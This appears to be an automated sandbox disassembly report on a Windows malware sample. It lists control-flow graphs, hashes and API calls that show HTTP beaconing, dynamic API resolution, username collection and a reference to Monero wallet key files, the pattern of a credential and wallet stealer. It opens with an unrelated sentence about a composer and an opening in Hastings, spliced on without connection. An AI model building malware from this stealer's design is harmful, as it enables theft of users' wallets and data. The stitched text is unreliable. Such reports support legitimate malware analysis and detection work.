British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 3069bc3d513d704ecea586b57cfcc8699ee1fee00edd2517562e301d542531be
                  • Instruction ID: 043819b6cf9ca9f037ca0024a01dc3af61fb4fe6afdae2d63229073b4f101c8d
                  • Opcode Fuzzy Hash: 3069bc3d513d704ecea586b57cfcc8699ee1fee00edd2517562e301d542531be
                  • Instruction Fuzzy Hash: 664146607E36146AE73ABBE48CC2F9D7666DF47718F519A48FA0053282CBB0B5A04572

                  Control-flow Graph

                  • 801: 2a4880-2a4942 call 2ba7a0 call 2a47b0 call 2ba740 * 5 InternetOpenA StrCmpCA -> 816, 817
                  • 816: 2a494b-2a494f -> 818, 819
                  • 817: 2a4944 -> 816
                  • 818: 2a4ecb-2a4ef3 InternetCloseHandle call 2baad0 call 2a9ac0 -> 829, 830
                  • 819: 2a4955-2a4acd call 2b8b60 call 2ba920 call 2ba8a0 call 2ba800 * 2 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba920 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba920 call 2ba8a0 call 2ba800 * 2 InternetConnectA -> 818, 905
                  • 829: 2a4f32-2a4fa2 call 2b8990 * 2 call 2ba7a0 call 2ba800 * 8 (function exit)
                  • 830: 2a4ef5-2a4f2d call 2ba820 call 2ba9b0 call 2ba8a0 call 2ba800 -> 829
                  • 905: 2a4ad3-2a4ad7 -> 906, 907
                  • 906: 2a4ad9-2a4ae3 -> 908
                  • 907: 2a4ae5 -> 908
                  • 908: 2a4aef-2a4b22 HttpOpenRequestA -> 909, 910
                  • 909: 2a4b28-2a4e28 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba920 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba920 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba920 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba920 call 2ba8a0 call 2ba800 call 2ba740 call 2ba920 * 2 call 2ba8a0 call 2ba800 * 2 call 2baad0 lstrlen call 2baad0 * 2 lstrlen call 2baad0 HttpSendRequestA -> 1021
                  • 910: 2a4ebe-2a4ec5 InternetCloseHandle -> 818
                  • 1021: 2a4e32-2a4e5c InternetReadFile -> 1022, 1023
                  • 1022: 2a4e5e-2a4e65 -> 1023, 1024
                  • 1023: 2a4e67-2a4eb9 InternetCloseHandle call 2ba800 -> 910
                  • 1024: 2a4e69-2a4ea7 call 2ba9b0 call 2ba8a0 call 2ba800 -> 1021
                  APIs
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002A4839
                    • Part of subcall function 002A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 002A4849
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002A4915
                  • StrCmpCA.SHLWAPI(?,00D5FCE0), ref: 002A493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002A4ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,002C0DDB,00000000,?,?,00000000,?,",00000000,?,00D5FC60), ref: 002A4DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002A4E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 002A4E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002A4E49
                  • InternetCloseHandle.WININET(00000000), ref: 002A4EAD
                  • InternetCloseHandle.WININET(00000000), ref: 002A4EC5
                  • HttpOpenRequestA.WININET(00000000,00D5FCD0,?,00D5F350,00000000,00000000,00400100,00000000), ref: 002A4B15
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                  • InternetCloseHandle.WININET(00000000), ref: 002A4ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: 25b43093f0e1a46f7ec6b2619e08124b11973971b5c016da81010fc2b4e9fccd
                  • Instruction ID: 2d63dda54827f003fd068fc8c20c62a339e4f8347bd848445dab2a403f29d359
                  • Opcode Fuzzy Hash: 25b43093f0e1a46f7ec6b2619e08124b11973971b5c016da81010fc2b4e9fccd
                  • Instruction Fuzzy Hash: 2C121071920118BADB15EB90DCA2FEEB338BF15340F5041A9B10672492EF706F69CF62
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002A11B7), ref: 002B7880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B7887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 002B789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: cd55d9f223bc0c94cd55496ad6c1544531e24c201001aa74cf7063dd1e1a371e
                  • Instruction ID: 1c249197980332d4e64892b66d725c5147af25d8d79ac341c2982a18e78befb9
                  • Opcode Fuzzy Hash: cd55d9f223bc0c94cd55496ad6c1544531e24c201001aa74cf7063dd1e1a371e
                  • Instruction Fuzzy Hash: 1AF04FB1D44248ABCB00DF98DD89BAEBBB8FB05711F10026AFA05A2680C77465148BA2
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: a915f370553f793dd2308fa8ffb20c27d1e730e40d35e4f011bc5a2b9bf29fd5
                  • Instruction ID: 4bf5812a6cc3b17a47beb2a3dbe27251c8f96fb1ca66a904ae4880cbd2528370
                  • Opcode Fuzzy Hash: a915f370553f793dd2308fa8ffb20c27d1e730e40d35e4f011bc5a2b9bf29fd5
                  • Instruction Fuzzy Hash: 8AD05E7490030CDBCB00DFE0D8896DDBB78FB08322F000564E90562340EA30A4A1CAAA

                  Control-flow Graph

                  • 633: 2b9c10-2b9c1a -> 634, 635
                  • 634: 2b9c20-2ba031 GetProcAddress * 43 -> 635
                  • 635: 2ba036-2ba0ca LoadLibraryA * 8 -> 636, 637
                  • 636: 2ba0cc-2ba141 GetProcAddress * 5 -> 637
                  • 637: 2ba146-2ba14d -> 638, 639
                  • 638: 2ba153-2ba211 GetProcAddress * 8 -> 639
                  • 639: 2ba216-2ba21d -> 640, 641
                  • 640: 2ba298-2ba29f -> 642, 643
                  • 641: 2ba21f-2ba293 GetProcAddress * 5 -> 640
                  • 642: 2ba337-2ba33e -> 644, 645
                  • 643: 2ba2a5-2ba332 GetProcAddress * 6 -> 642
                  • 644: 2ba41f-2ba426 -> 646, 647
                  • 645: 2ba344-2ba41a GetProcAddress * 9 -> 644
                  • 646: 2ba428-2ba49d GetProcAddress * 5 -> 647
                  • 647: 2ba4a2-2ba4a9 -> 648, 649
                  • 648: 2ba4ab-2ba4d7 GetProcAddress * 2 -> 649
                  • 649: 2ba4dc-2ba4e3 -> 650, 651
                  • 650: 2ba515-2ba51c -> 652, 653
                  • 651: 2ba4e5-2ba510 GetProcAddress * 2 -> 650
                  • 652: 2ba612-2ba619 -> 654, 655
                  • 653: 2ba522-2ba60d GetProcAddress * 10 -> 652
                  • 654: 2ba61b-2ba678 GetProcAddress * 4 -> 655
                  • 655: 2ba67d-2ba684 -> 656, 657
                  • 656: 2ba69e-2ba6a5 -> 658, 659
                  • 657: 2ba686-2ba699 GetProcAddress -> 656
                  • 658: 2ba708-2ba709 (function exit)
                  • 659: 2ba6a7-2ba703 GetProcAddress * 4 -> 658
                  APIs
                  • GetProcAddress.KERNEL32(76210000,00D456E8), ref: 002B9C2D
                  • GetProcAddress.KERNEL32(76210000,00D45548), ref: 002B9C45
                  • GetProcAddress.KERNEL32(76210000,00D58F98), ref: 002B9C5E
                  • GetProcAddress.KERNEL32(76210000,00D58D70), ref: 002B9C76
                  • GetProcAddress.KERNEL32(76210000,00D58D88), ref: 002B9C8E
                  • GetProcAddress.KERNEL32(76210000,00D5DB20), ref: 002B9CA7
                  • GetProcAddress.KERNEL32(76210000,00D4A630), ref: 002B9CBF
                  • GetProcAddress.KERNEL32(76210000,00D5DC70), ref: 002B9CD7
                  • GetProcAddress.KERNEL32(76210000,00D5DB08), ref: 002B9CF0
                  • GetProcAddress.KERNEL32(76210000,00D5DC58), ref: 002B9D08
                  • GetProcAddress.KERNEL32(76210000,00D5DC10), ref: 002B9D20
                  • GetProcAddress.KERNEL32(76210000,00D45688), ref: 002B9D39
                  • GetProcAddress.KERNEL32(76210000,00D45568), ref: 002B9D51
                  • GetProcAddress.KERNEL32(76210000,00D456A8), ref: 002B9D69
                  • GetProcAddress.KERNEL32(76210000,00D456C8), ref: 002B9D82
                  • GetProcAddress.KERNEL32(76210000,00D5DB80), ref: 002B9D9A
                  • GetProcAddress.KERNEL32(76210000,00D5DC40), ref: 002B9DB2
                  • GetProcAddress.KERNEL32(76210000,00D4A8B0), ref: 002B9DCB
                  • GetProcAddress.KERNEL32(76210000,00D45348), ref: 002B9DE3
                  • GetProcAddress.KERNEL32(76210000,00D5DD78), ref: 002B9DFB
                  • GetProcAddress.KERNEL32(76210000,00D5DC88), ref: 002B9E14
                  • GetProcAddress.KERNEL32(76210000,00D5DB98), ref: 002B9E2C
                  • GetProcAddress.KERNEL32(76210000,00D5DBB0), ref: 002B9E44
                  • GetProcAddress.KERNEL32(76210000,00D455A8), ref: 002B9E5D
                  • GetProcAddress.KERNEL32(76210000,00D5DAD8), ref: 002B9E75
                  • GetProcAddress.KERNEL32(76210000,00D5DD30), ref: 002B9E8D
                  • GetProcAddress.KERNEL32(76210000,00D5DAF0), ref: 002B9EA6
                  • GetProcAddress.KERNEL32(76210000,00D5DBC8), ref: 002B9EBE
                  • GetProcAddress.KERNEL32(76210000,00D5DCD0), ref: 002B9ED6
                  • GetProcAddress.KERNEL32(76210000,00D5DCB8), ref: 002B9EEF
                  • GetProcAddress.KERNEL32(76210000,00D5DCE8), ref: 002B9F07
                  • GetProcAddress.KERNEL32(76210000,00D5DC28), ref: 002B9F1F
                  • GetProcAddress.KERNEL32(76210000,00D5DCA0), ref: 002B9F38
                  • GetProcAddress.KERNEL32(76210000,00D4FD78), ref: 002B9F50
                  • GetProcAddress.KERNEL32(76210000,00D5DDA8), ref: 002B9F68
                  • GetProcAddress.KERNEL32(76210000,00D5DBF8), ref: 002B9F81
                  • GetProcAddress.KERNEL32(76210000,00D45368), ref: 002B9F99
                  • GetProcAddress.KERNEL32(76210000,00D5DD00), ref: 002B9FB1
                  • GetProcAddress.KERNEL32(76210000,00D455C8), ref: 002B9FCA
                  • GetProcAddress.KERNEL32(76210000,00D5DD18), ref: 002B9FE2
                  • GetProcAddress.KERNEL32(76210000,00D5DAC0), ref: 002B9FFA
                  • GetProcAddress.KERNEL32(76210000,00D45588), ref: 002BA013
                  • GetProcAddress.KERNEL32(76210000,00D455E8), ref: 002BA02B
                  • LoadLibraryA.KERNEL32(00D5DBE0,?,002B5CA3,002C0AEB,?,?,?,?,?,?,?,?,?,?,002C0AEA,002C0AE3), ref: 002BA03D
                  • LoadLibraryA.KERNEL32(00D5DD48,?,002B5CA3,002C0AEB,?,?,?,?,?,?,?,?,?,?,002C0AEA,002C0AE3), ref: 002BA04E
                  • LoadLibraryA.KERNEL32(00D5DD60,?,002B5CA3,002C0AEB,?,?,?,?,?,?,?,?,?,?,002C0AEA,002C0AE3), ref: 002BA060
                  • LoadLibraryA.KERNEL32(00D5DD90,?,002B5CA3,002C0AEB,?,?,?,?,?,?,?,?,?,?,002C0AEA,002C0AE3), ref: 002BA072
                  • LoadLibraryA.KERNEL32(00D5DB38,?,002B5CA3,002C0AEB,?,?,?,?,?,?,?,?,?,?,002C0AEA,002C0AE3), ref: 002BA083
                  • LoadLibraryA.KERNEL32(00D5DB50,?,002B5CA3,002C0AEB,?,?,?,?,?,?,?,?,?,?,002C0AEA,002C0AE3), ref: 002BA095
                  • LoadLibraryA.KERNEL32(00D5DB68,?,002B5CA3,002C0AEB,?,?,?,?,?,?,?,?,?,?,002C0AEA,002C0AE3), ref: 002BA0A7
                  • LoadLibraryA.KERNEL32(00D5DF70,?,002B5CA3,002C0AEB,?,?,?,?,?,?,?,?,?,?,002C0AEA,002C0AE3), ref: 002BA0B8
                  • GetProcAddress.KERNEL32(751E0000,00D45168), ref: 002BA0DA
                  • GetProcAddress.KERNEL32(751E0000,00D5DE08), ref: 002BA0F2
                  • GetProcAddress.KERNEL32(751E0000,00D58AF8), ref: 002BA10A
                  • GetProcAddress.KERNEL32(751E0000,00D5DDC0), ref: 002BA123
                  • GetProcAddress.KERNEL32(751E0000,00D45068), ref: 002BA13B
                  • GetProcAddress.KERNEL32(73FB0000,00D4A928), ref: 002BA160
                  • GetProcAddress.KERNEL32(73FB0000,00D452C8), ref: 002BA179
                  • GetProcAddress.KERNEL32(73FB0000,00D4A478), ref: 002BA191
                  • GetProcAddress.KERNEL32(73FB0000,00D5DEB0), ref: 002BA1A9
                  • GetProcAddress.KERNEL32(73FB0000,00D5DF58), ref: 002BA1C2
                  • GetProcAddress.KERNEL32(73FB0000,00D45088), ref: 002BA1DA
                  • GetProcAddress.KERNEL32(73FB0000,00D452E8), ref: 002BA1F2
                  • GetProcAddress.KERNEL32(73FB0000,00D5DEF8), ref: 002BA20B
                  • GetProcAddress.KERNEL32(753A0000,00D451E8), ref: 002BA22C
                  • GetProcAddress.KERNEL32(753A0000,00D44FC8), ref: 002BA244
                  • GetProcAddress.KERNEL32(753A0000,00D5DE98), ref: 002BA25D
                  • GetProcAddress.KERNEL32(753A0000,00D5DE20), ref: 002BA275
                  • GetProcAddress.KERNEL32(753A0000,00D450A8), ref: 002BA28D
                  • GetProcAddress.KERNEL32(76310000,00D4A770), ref: 002BA2B3
                  • GetProcAddress.KERNEL32(76310000,00D4A7C0), ref: 002BA2CB
                  • GetProcAddress.KERNEL32(76310000,00D5DDD8), ref: 002BA2E3
                  • GetProcAddress.KERNEL32(76310000,00D451C8), ref: 002BA2FC
                  • GetProcAddress.KERNEL32(76310000,00D45208), ref: 002BA314
                  • GetProcAddress.KERNEL32(76310000,00D4A888), ref: 002BA32C
                  • GetProcAddress.KERNEL32(76910000,00D5DF10), ref: 002BA352
                  • GetProcAddress.KERNEL32(76910000,00D45228), ref: 002BA36A
                  • GetProcAddress.KERNEL32(76910000,00D58BA8), ref: 002BA382
                  • GetProcAddress.KERNEL32(76910000,00D5DE38), ref: 002BA39B
                  • GetProcAddress.KERNEL32(76910000,00D5DEC8), ref: 002BA3B3
                  • GetProcAddress.KERNEL32(76910000,00D45028), ref: 002BA3CB
                  • GetProcAddress.KERNEL32(76910000,00D45008), ref: 002BA3E4
                  • GetProcAddress.KERNEL32(76910000,00D5DE80), ref: 002BA3FC
                  • GetProcAddress.KERNEL32(76910000,00D5DDF0), ref: 002BA414
                  • GetProcAddress.KERNEL32(75B30000,00D450C8), ref: 002BA436
                  • GetProcAddress.KERNEL32(75B30000,00D5DE50), ref: 002BA44E
                  • GetProcAddress.KERNEL32(75B30000,00D5DF28), ref: 002BA466
                  • GetProcAddress.KERNEL32(75B30000,00D5DEE0), ref: 002BA47F
                  • GetProcAddress.KERNEL32(75B30000,00D5DF40), ref: 002BA497
                  • GetProcAddress.KERNEL32(75670000,00D45268), ref: 002BA4B8
                  • GetProcAddress.KERNEL32(75670000,00D450E8), ref: 002BA4D1
                  • GetProcAddress.KERNEL32(76AC0000,00D45248), ref: 002BA4F2
                  • GetProcAddress.KERNEL32(76AC0000,00D5DE68), ref: 002BA50A
                  • GetProcAddress.KERNEL32(6F4E0000,00D45108), ref: 002BA530
                  • GetProcAddress.KERNEL32(6F4E0000,00D44FA8), ref: 002BA548
                  • GetProcAddress.KERNEL32(6F4E0000,00D45128), ref: 002BA560
                  • GetProcAddress.KERNEL32(6F4E0000,00D5D910), ref: 002BA579
                  • GetProcAddress.KERNEL32(6F4E0000,00D45288), ref: 002BA591
                  • GetProcAddress.KERNEL32(6F4E0000,00D45188), ref: 002BA5A9
                  • GetProcAddress.KERNEL32(6F4E0000,00D452A8), ref: 002BA5C2
                  • GetProcAddress.KERNEL32(6F4E0000,00D45148), ref: 002BA5DA
                  • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 002BA5F1
                  • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 002BA607
                  • GetProcAddress.KERNEL32(75AE0000,00D5D880), ref: 002BA629
                  • GetProcAddress.KERNEL32(75AE0000,00D58B28), ref: 002BA641
                  • GetProcAddress.KERNEL32(75AE0000,00D5DAA8), ref: 002BA659
                  • GetProcAddress.KERNEL32(75AE0000,00D5DA60), ref: 002BA672
                  • GetProcAddress.KERNEL32(76300000,00D45308), ref: 002BA693
                  • GetProcAddress.KERNEL32(6FE10000,00D5DA78), ref: 002BA6B4
                  • GetProcAddress.KERNEL32(6FE10000,00D45328), ref: 002BA6CD
                  • GetProcAddress.KERNEL32(6FE10000,00D5DA00), ref: 002BA6E5
                  • GetProcAddress.KERNEL32(6FE10000,00D5D838), ref: 002BA6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: fc34123f120cfba800df1feeb56144007dfc1a8aa8ce907cc90fc1771350d8a6
                  • Instruction ID: 7f129cc8119026178bd486d9d0bf19b16ef474754190779c8152d7f6d099691d
                  • Opcode Fuzzy Hash: fc34123f120cfba800df1feeb56144007dfc1a8aa8ce907cc90fc1771350d8a6
                  • Instruction Fuzzy Hash: 67624FB55002C0AFC354EFA8EDC89567BF9F74C301705853EA605CB266D639B8A5CF1A

                  Control-flow Graph

                  control_flow_graph 1033 2a6280-2a630b call 2ba7a0 call 2a47b0 call 2ba740 InternetOpenA StrCmpCA 1040 2a630d 1033->1040 1041 2a6314-2a6318 1033->1041 1040->1041 1042 2a6509-2a6525 call 2ba7a0 call 2ba800 * 2 1041->1042 1043 2a631e-2a6342 InternetConnectA 1041->1043 1062 2a6528-2a652d 1042->1062 1045 2a6348-2a634c 1043->1045 1046 2a64ff-2a6503 InternetCloseHandle 1043->1046 1047 2a635a 1045->1047 1048 2a634e-2a6358 1045->1048 1046->1042 1050 2a6364-2a6392 HttpOpenRequestA 1047->1050 1048->1050 1052 2a6398-2a639c 1050->1052 1053 2a64f5-2a64f9 InternetCloseHandle 1050->1053 1055 2a639e-2a63bf InternetSetOptionA 1052->1055 1056 2a63c5-2a6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 2a642c-2a644b call 2b8940 1056->1058 1059 2a6407-2a6427 call 2ba740 call 2ba800 * 2 1056->1059 1066 2a64c9-2a64e9 call 2ba740 call 2ba800 * 2 1058->1066 1067 2a644d-2a6454 1058->1067 1059->1062 1066->1062 1069 2a6456-2a6480 InternetReadFile 1067->1069 1070 2a64c7-2a64ef InternetCloseHandle 1067->1070 1073 2a648b 1069->1073 1074 2a6482-2a6489 1069->1074 1070->1053 1073->1070 1074->1073 1078 2a648d-2a64c5 call 2ba9b0 call 2ba8a0 call 2ba800 1074->1078 1078->1069
                  APIs
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002A4839
                    • Part of subcall function 002A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 002A4849
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • InternetOpenA.WININET(002C0DFE,00000001,00000000,00000000,00000000), ref: 002A62E1
                  • StrCmpCA.SHLWAPI(?,00D5FCE0), ref: 002A6303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002A6335
                  • HttpOpenRequestA.WININET(00000000,GET,?,00D5F350,00000000,00000000,00400100,00000000), ref: 002A6385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002A63BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002A63D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 002A63FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002A646D
                  • InternetCloseHandle.WININET(00000000), ref: 002A64EF
                  • InternetCloseHandle.WININET(00000000), ref: 002A64F9
                  • InternetCloseHandle.WININET(00000000), ref: 002A6503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
